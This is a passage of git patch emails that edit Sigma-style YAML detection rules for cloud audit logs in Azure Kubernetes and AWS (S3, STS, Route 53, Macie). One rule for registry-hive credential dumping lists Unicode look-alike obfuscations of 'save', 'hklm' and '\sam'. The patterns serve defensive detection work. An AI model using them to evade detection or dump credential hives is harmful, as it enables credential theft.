2021 10:28:09 -0500 Subject: [PATCH 0081/1367] Update azure_kubernetes_events_deleted.yml --- rules/cloud/azure_kubernetes_events_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml index aa209c99..586761a0 100644 --- a/rules/cloud/azure_kubernetes_events_deleted.yml +++ b/rules/cloud/azure_kubernetes_events_deleted.yml @@ -6,7 +6,7 @@ status: experimental date: 2021/07/24 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml + - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml logsource: service: azure.activitylogs detection: From 0445be8d01c596caa210bee0f9fcabae07ce4fe0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:28:21 -0500 Subject: [PATCH 0082/1367] Update azure_kubernetes_events_deleted.yml --- rules/cloud/azure_kubernetes_events_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml index 586761a0..68a160c4 100644 --- a/rules/cloud/azure_kubernetes_events_deleted.yml +++ b/rules/cloud/azure_kubernetes_events_deleted.yml @@ -18,7 +18,7 @@ level: medium tags: - attack.defense_evasion - attack.t1562 - - attack.t1562.001 + - attack.t1562.001 falsepositives: - Events deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 152951f171cb77905a5da29de69927b0c15c4d7e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:32:19 -0500 Subject: [PATCH 0083/1367] Update azure_kubernetes_pods_deleted.yml --- rules/cloud/azure_kubernetes_pods_deleted.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure_kubernetes_pods_deleted.yml index 86097c0b..77916784 100644 --- a/rules/cloud/azure_kubernetes_pods_deleted.yml +++ b/rules/cloud/azure_kubernetes_pods_deleted.yml @@ -12,7 +12,6 @@ logsource: detection: selection_operation_name: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE - status: success condition: all of them level: medium tags: From e123635c42410535760a47836d478f749b7c95eb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:32:27 -0500 Subject: [PATCH 0084/1367] Update azure_kubernetes_events_deleted.yml --- rules/cloud/azure_kubernetes_events_deleted.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml index 68a160c4..4693d487 100644 --- a/rules/cloud/azure_kubernetes_events_deleted.yml +++ b/rules/cloud/azure_kubernetes_events_deleted.yml @@ -12,7 +12,6 @@ logsource: detection: selection_operationname: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE - status: success condition: all of them level: medium tags: From da6e7475479a986b3c95c07884d10f7ce48cdf1d Mon Sep 17 00:00:00 2001 From: John Lambert Date: Sat, 24 Jul 2021 10:33:15 -0500 Subject: [PATCH 0085/1367] cover evasions from unicode substitutions MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Add variations to cover unicode substitutions to avoid evasion. > Unicode contains a range for Spacing Modifier Letters (0x02B0 - 0x02FF) [4], which includes characters such as ˪, ˣ and ˢ. Some command-line parsers recognise these as letters and convert them back to l, x and s respectively. See (https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation) by @Wietze --- .../win_grabbing_sensitive_hives_via_reg.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml b/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml index a0ae78a1..2ea66c74 100644 --- a/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml +++ b/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml @@ -7,6 +7,7 @@ references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md + - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation tags: - attack.credential_access - attack.t1003.002 @@ -23,15 +24,25 @@ detection: CommandLine|contains: - 'save' - 'export' + - 'ˢave' + - 'eˣport' selection_2: CommandLine|contains: - 'hklm' - 'hkey_local_machine' + - 'hkey_˪ocal_machine' + - 'hkey_loca˪_machine' + - 'hkey_˪oca˪_machine' selection_3: CommandLine|endswith: - '\system' - '\sam' - '\security' + - '\ˢystem' + - '\syˢtem' + - '\ˢyˢtem' + - '\ˢam' + - '\ˢecurity' condition: selection_1 and selection_2 and selection_3 falsepositives: - Dumping hives for legitimate purpouse i.e. backup or forensic investigation From 9bef445f9452780157cf6ee40a8fe57e9c532b75 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:42:53 -0500 Subject: [PATCH 0086/1367] Update azure_kubernetes_pods_deleted.yml --- rules/cloud/azure_kubernetes_pods_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure_kubernetes_pods_deleted.yml index 77916784..95f31977 100644 --- a/rules/cloud/azure_kubernetes_pods_deleted.yml +++ b/rules/cloud/azure_kubernetes_pods_deleted.yml @@ -12,7 +12,7 @@ logsource: detection: selection_operation_name: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE - condition: all of them + condition: selection_operation_name level: medium tags: - attack.impact From 9a9f0cf5945fb1ce0aa5fc4e5d45aab0fc7258ed Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:44:06 -0500 Subject: [PATCH 0087/1367] Update azure_kubernetes_events_deleted.yml --- rules/cloud/azure_kubernetes_events_deleted.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml index 4693d487..775c650a 100644 --- a/rules/cloud/azure_kubernetes_events_deleted.yml +++ b/rules/cloud/azure_kubernetes_events_deleted.yml @@ -10,14 +10,14 @@ references: logsource: service: azure.activitylogs detection: - selection_operationname: + selection_operation_name: - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE - condition: all of them + condition: selection_operation_name level: medium tags: - attack.defense_evasion - attack.t1562 - attack.t1562.001 falsepositives: -- Events deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +- Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d7303ed7b2e7d61bd90bf93a947121205ee67774 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 11:09:31 -0500 Subject: [PATCH 0088/1367] Create aws_s3_data_management_tampering.yml --- rules/aws_s3_data_management_tampering.yml | 39 ++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 rules/aws_s3_data_management_tampering.yml diff --git a/rules/aws_s3_data_management_tampering.yml b/rules/aws_s3_data_management_tampering.yml new file mode 100644 index 00000000..9cd4fc63 --- /dev/null +++ b/rules/aws_s3_data_management_tampering.yml @@ -0,0 +1,39 @@ +title: AWS S3 Data Management Tamperin +id: 78b3756a-7804-4ef7-8555-7b9024a02e2d +description: Detects when a user tampers with S3 data management in Amazon Web Services. +author: Elastic, Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html + - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: iam.amazonaws.com + selection_eventname1: + - eventName: PutBucketLogging + selection_eventname2: + - eventName: PutBucketWebsite + selection_eventname3: + - eventName: PutEncryptionConfiguration + selection_eventname4: + - eventName: PutLifecycleConfiguration + selection_eventname5: + - eventName: PutReplicationConfiguration + selection_eventname6: + - eventName: ReplicateObject + selection_eventname7: + - eventName: RestoreObject + condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 or selection_eventname6 or selection_eventname7 +level: low +tags: + - attack.exfiltration + - attack.t1537 +falsepositives: +- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 64e655d6efe9d5ba3e49e94324db8da3a376ba3f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 11:11:21 -0500 Subject: [PATCH 0089/1367] Delete aws_s3_data_management_tampering.yml --- rules/aws_s3_data_management_tampering.yml | 39 ---------------------- 1 file changed, 39 deletions(-) delete mode 100644 rules/aws_s3_data_management_tampering.yml diff --git a/rules/aws_s3_data_management_tampering.yml b/rules/aws_s3_data_management_tampering.yml deleted file mode 100644 index 9cd4fc63..00000000 --- a/rules/aws_s3_data_management_tampering.yml +++ /dev/null @@ -1,39 +0,0 @@ -title: AWS S3 Data Management Tamperin -id: 78b3756a-7804-4ef7-8555-7b9024a02e2d -description: Detects when a user tampers with S3 data management in Amazon Web Services. -author: Elastic, Austin Songer -status: experimental -date: 2021/07/24 -references: - - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html - - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html - - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html - - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html - - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html - - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html -logsource: - service: cloudtrail -detection: - selection_source: - - eventSource: iam.amazonaws.com - selection_eventname1: - - eventName: PutBucketLogging - selection_eventname2: - - eventName: PutBucketWebsite - selection_eventname3: - - eventName: PutEncryptionConfiguration - selection_eventname4: - - eventName: PutLifecycleConfiguration - selection_eventname5: - - eventName: PutReplicationConfiguration - selection_eventname6: - - eventName: ReplicateObject - selection_eventname7: - - eventName: RestoreObject - condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 or selection_eventname6 or selection_eventname7 -level: low -tags: - - attack.exfiltration - - attack.t1537 -falsepositives: -- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d283e97415aa8d1d9ff53c93ff46aebe3b97a26c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 11:12:19 -0500 Subject: [PATCH 0090/1367] Create aws_s3_data_management_tampering.yml --- .../aws_s3_data_management_tampering.yml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 rules/cloud/aws_s3_data_management_tampering.yml diff --git a/rules/cloud/aws_s3_data_management_tampering.yml b/rules/cloud/aws_s3_data_management_tampering.yml new file mode 100644 index 00000000..4c108805 --- /dev/null +++ b/rules/cloud/aws_s3_data_management_tampering.yml @@ -0,0 +1,39 @@ +title: AWS S3 Data Management Tampering +id: 78b3756a-7804-4ef7-8555-7b9024a02e2d +description: Detects when a user tampers with S3 data management in Amazon Web Services. +author: Elastic, Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html + - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: iam.amazonaws.com + selection_eventname1: + - eventName: PutBucketLogging + selection_eventname2: + - eventName: PutBucketWebsite + selection_eventname3: + - eventName: PutEncryptionConfiguration + selection_eventname4: + - eventName: PutLifecycleConfiguration + selection_eventname5: + - eventName: PutReplicationConfiguration + selection_eventname6: + - eventName: ReplicateObject + selection_eventname7: + - eventName: RestoreObject + condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 or selection_eventname6 or selection_eventname7 +level: low +tags: + - attack.exfiltration + - attack.t1537 +falsepositives: +- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 99c2edb608a07f0ea083a82b88f80410709ba011 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 11:17:18 -0500 Subject: [PATCH 0091/1367] Update aws_s3_data_management_tampering.yml --- rules/cloud/aws_s3_data_management_tampering.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws_s3_data_management_tampering.yml b/rules/cloud/aws_s3_data_management_tampering.yml index 4c108805..20a38183 100644 --- a/rules/cloud/aws_s3_data_management_tampering.yml +++ b/rules/cloud/aws_s3_data_management_tampering.yml @@ -1,10 +1,11 @@ -title: AWS S3 Data Management Tampering +title: AWS S3 Data Management Tamperin id: 78b3756a-7804-4ef7-8555-7b9024a02e2d description: Detects when a user tampers with S3 data management in Amazon Web Services. -author: Elastic, Austin Songer +author: Austin Songer status: experimental date: 2021/07/24 references: + - https://github.com/elastic/detection-rules/pull/1145/files - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html From 8a1909ccc276990cfd1f311ffdc3cca4b925d3ee Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 11:32:07 -0500 Subject: [PATCH 0092/1367] Create aws_sts_getsessiontoken_abuse.yml --- rules/cloud/aws_sts_getsessiontoken_abuse.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/cloud/aws_sts_getsessiontoken_abuse.yml diff --git a/rules/cloud/aws_sts_getsessiontoken_abuse.yml b/rules/cloud/aws_sts_getsessiontoken_abuse.yml new file mode 100644 index 00000000..682b1d00 --- /dev/null +++ b/rules/cloud/aws_sts_getsessiontoken_abuse.yml @@ -0,0 +1,27 @@ +title: AWS STS GetSessionToken Abuse +id: b45ab1d2-712f-4f01-a751-df3826969807 +description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: sts.amazonaws.com + selection_eventname1: + - eventName: GetSessionToken + selection_usertype: + - userIdentity.type: IAMUser + condition: all of them +level: low +tags: + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 +falsepositives: +- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 9fe7b8799586f330fd39356d12c139dacd3e6040 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 11:33:01 -0500 Subject: [PATCH 0093/1367] Delete aws_sts_getsessiontoken_abuse.yml --- rules/cloud/aws_sts_getsessiontoken_abuse.yml | 27 ------------------- 1 file changed, 27 deletions(-) delete mode 100644 rules/cloud/aws_sts_getsessiontoken_abuse.yml diff --git a/rules/cloud/aws_sts_getsessiontoken_abuse.yml b/rules/cloud/aws_sts_getsessiontoken_abuse.yml deleted file mode 100644 index 682b1d00..00000000 --- a/rules/cloud/aws_sts_getsessiontoken_abuse.yml +++ /dev/null @@ -1,27 +0,0 @@ -title: AWS STS GetSessionToken Abuse -id: b45ab1d2-712f-4f01-a751-df3826969807 -description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. -author: Austin Songer -status: experimental -date: 2021/07/24 -references: - - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html -logsource: - service: cloudtrail -detection: - selection_source: - - eventSource: sts.amazonaws.com - selection_eventname1: - - eventName: GetSessionToken - selection_usertype: - - userIdentity.type: IAMUser - condition: all of them -level: low -tags: - - attack.lateral_movement - - attack.privilege_escalation - - attack.t1548 - - attack.t1550 - - attack.t1550.001 -falsepositives: -- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From e0238424639fefba02f894401b55ee02afa63a1d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 12:03:35 -0500 Subject: [PATCH 0094/1367] Create aws_sts_assumedrole_misuse.yml --- rules/cloud/aws_sts_assumedrole_misuse.yml | 29 ++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/cloud/aws_sts_assumedrole_misuse.yml diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws_sts_assumedrole_misuse.yml new file mode 100644 index 00000000..8d28cd44 --- /dev/null +++ b/rules/cloud/aws_sts_assumedrole_misuse.yml @@ -0,0 +1,29 @@ +title: AWS STS AssumedRole Misuse +id: b45ab1d2-712f-4f01-a751-df3826969807 +description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://github.com/elastic/detection-rules/pull/1214 + - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: sts.amazonaws.com + selection_eventname1: + - eventName: AssumedRole + selection_userrole: + - userIdentity.sessionContext: Role + condition: all of them +level: low +tags: + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 +falsepositives: +- AssumedRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumedRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +- Automated processes that uses Terraform may lead to false positives. From d9f70366b62168e247403ef4ea58b87bce4be843 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 12:05:44 -0500 Subject: [PATCH 0095/1367] Create aws_sts_getsessiontoken_misuse.yml --- .../cloud/aws_sts_getsessiontoken_misuse.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/cloud/aws_sts_getsessiontoken_misuse.yml diff --git a/rules/cloud/aws_sts_getsessiontoken_misuse.yml b/rules/cloud/aws_sts_getsessiontoken_misuse.yml new file mode 100644 index 00000000..265b18f7 --- /dev/null +++ b/rules/cloud/aws_sts_getsessiontoken_misuse.yml @@ -0,0 +1,28 @@ +title: AWS STS GetSessionToken Misuse +id: b45ab1d2-712f-4f01-a751-df3826969807 +description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://github.com/elastic/detection-rules/pull/1213 + - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: sts.amazonaws.com + selection_eventname1: + - eventName: GetSessionToken + selection_usertype: + - userIdentity.type: IAMUser + condition: all of them +level: low +tags: + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 +falsepositives: +- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From ebe7e4c89e974319b396288582918f7dc4505ee9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 16:18:06 -0500 Subject: [PATCH 0096/1367] Update aws_sts_getsessiontoken_misuse.yml --- rules/cloud/aws_sts_getsessiontoken_misuse.yml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/rules/cloud/aws_sts_getsessiontoken_misuse.yml b/rules/cloud/aws_sts_getsessiontoken_misuse.yml index 265b18f7..71ec2267 100644 --- a/rules/cloud/aws_sts_getsessiontoken_misuse.yml +++ b/rules/cloud/aws_sts_getsessiontoken_misuse.yml @@ -10,13 +10,11 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: sts.amazonaws.com - selection_eventname1: - - eventName: GetSessionToken - selection_usertype: - - userIdentity.type: IAMUser - condition: all of them + selection: + eventSource: sts.amazonaws.com + eventName: GetSessionToken + userIdentity.type: IAMUser + condition: selection level: low tags: - attack.lateral_movement From 67c17b9330552b95c47d7774a173a88efb694b95 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 16:18:34 -0500 Subject: [PATCH 0097/1367] Update aws_sts_assumedrole_misuse.yml --- rules/cloud/aws_sts_assumedrole_misuse.yml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws_sts_assumedrole_misuse.yml index 8d28cd44..869c4f2d 100644 --- a/rules/cloud/aws_sts_assumedrole_misuse.yml +++ b/rules/cloud/aws_sts_assumedrole_misuse.yml @@ -10,13 +10,11 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: sts.amazonaws.com - selection_eventname1: - - eventName: AssumedRole - selection_userrole: - - userIdentity.sessionContext: Role - condition: all of them + selection: + eventSource: sts.amazonaws.com + eventName: AssumedRole + userIdentity.sessionContext: Role + condition: selection level: low tags: - attack.lateral_movement From 1405ae274e49dc4a953e7ec33646e73e5d01fd89 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 16:20:00 -0500 Subject: [PATCH 0098/1367] Update aws_elasticache_security_group_created.yml --- rules/cloud/aws_elasticache_security_group_created.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/rules/cloud/aws_elasticache_security_group_created.yml b/rules/cloud/aws_elasticache_security_group_created.yml index c0df4df4..26c08a75 100644 --- a/rules/cloud/aws_elasticache_security_group_created.yml +++ b/rules/cloud/aws_elasticache_security_group_created.yml @@ -9,11 +9,10 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: elasticache.amazonaws.com - selection_eventname: - - eventName: "Create Cache Security Group" - condition: all of them + selection: + eventSource: elasticache.amazonaws.com + eventName: "Create Cache Security Group" + condition: selection level: low tags: - attack.persistence From 2b57f95e72fedf9d61e8ef61572dd17fd756112b Mon Sep 17 00:00:00 2001 From: John Lambert Date: Sat, 24 Jul 2021 18:17:27 -0500 Subject: [PATCH 0099/1367] Update win_grabbing_sensitive_hives_via_reg.yml --- .../process_creation/win_grabbing_sensitive_hives_via_reg.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml b/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml index 2ea66c74..1a3788ee 100644 --- a/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml +++ b/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml @@ -29,6 +29,7 @@ detection: selection_2: CommandLine|contains: - 'hklm' + - 'hk˪m' - 'hkey_local_machine' - 'hkey_˪ocal_machine' - 'hkey_loca˪_machine' From b7fc362f4ae58dbf1a41f8b6b53f7e68dba0d18a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 25 Jul 2021 02:22:13 -0500 Subject: [PATCH 0100/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- .../aws_route_53_domain_transferred_lock_disabled.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index 5f7ab706..f979bfea 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -11,11 +11,10 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: route53.amazonaws.com - selection_eventname: - - eventName: DisableDomainTransferLock - condition: all of them + selection: + eventSource: route53.amazonaws.com + eventName: DisableDomainTransferLock + condition: selection level: low tags: - attack.persistence From 0a07795a4ecd6dcf7d9b7d7d4501147733730bab Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 25 Jul 2021 02:24:22 -0500 Subject: [PATCH 0101/1367] Update aws_route_53_domain_transferred_to_another_account.yml --- ...ws_route_53_domain_transferred_to_another_account.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml index a37bd58a..d5ec0275 100644 --- a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -9,11 +9,10 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: route53.amazonaws.com - selection_eventname: - - eventName: TransferDomainToAnotherAwsAccount - condition: all of them + selection: + eventSource: route53.amazonaws.com + eventName: TransferDomainToAnotherAwsAccount + condition: selection tags: - attack.persistence - attack.credential_access From 1be402e7915dce0b65da19fe19f6c4a69d431a72 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 25 Jul 2021 02:25:24 -0500 Subject: [PATCH 0102/1367] Update aws_s3_data_management_tampering.yml --- .../aws_s3_data_management_tampering.yml | 28 ++++++++----------- 1 file changed, 11 insertions(+), 17 deletions(-) diff --git a/rules/cloud/aws_s3_data_management_tampering.yml b/rules/cloud/aws_s3_data_management_tampering.yml index 20a38183..4787fd14 100644 --- a/rules/cloud/aws_s3_data_management_tampering.yml +++ b/rules/cloud/aws_s3_data_management_tampering.yml @@ -15,23 +15,17 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: iam.amazonaws.com - selection_eventname1: - - eventName: PutBucketLogging - selection_eventname2: - - eventName: PutBucketWebsite - selection_eventname3: - - eventName: PutEncryptionConfiguration - selection_eventname4: - - eventName: PutLifecycleConfiguration - selection_eventname5: - - eventName: PutReplicationConfiguration - selection_eventname6: - - eventName: ReplicateObject - selection_eventname7: - - eventName: RestoreObject - condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 or selection_eventname6 or selection_eventname7 + selection: + eventSource: iam.amazonaws.com + eventName: + - PutBucketLogging + - PutBucketWebsite + - PutEncryptionConfiguration + - PutLifecycleConfiguration + - PutReplicationConfiguration + - ReplicateObject + - RestoreObject + condition: selection level: low tags: - attack.exfiltration From 288e4b502f5bbee8e5a145bf54cf65c3d24b7338 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 15:14:44 +0700 Subject: [PATCH 0103/1367] Create aws_macic_evasion --- rules/cloud/aws_macic_evasion | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 rules/cloud/aws_macic_evasion diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion new file mode 100644 index 00000000..f2305ac3 --- /dev/null +++ b/rules/cloud/aws_macic_evasion @@ -0,0 +1,36 @@ +title: AWS Possible Macie Evasion +id: 91f6a16c-ef71-437a-99ac-0b070e3ad221 +status: experimental +description: Detects evade to Macie detection. +author: Sittikorn S +date: 2021/07/06 +reference: + - https://docs.aws.amazon.com/cli/latest/reference/macie/ +tags: + - attack.defensive_evasion + - attack.t1562.001 +logsource: + service: cloudtrail +detection: + selection: + eventName: + - 'ArchiveFindings' + - 'CreateFindingsFilter' + - 'DeleteMember' + - 'DisassociateFromMasterAccount' + - 'DisassociateMember' + - 'DisableMacie' + - 'UpdateFindingsFilter' + - 'UpdateMacieSession' + - 'UpdateMemberSession' + - 'DisableOrganizationAdminAccount' + - 'UpdateClassificationJob' + - 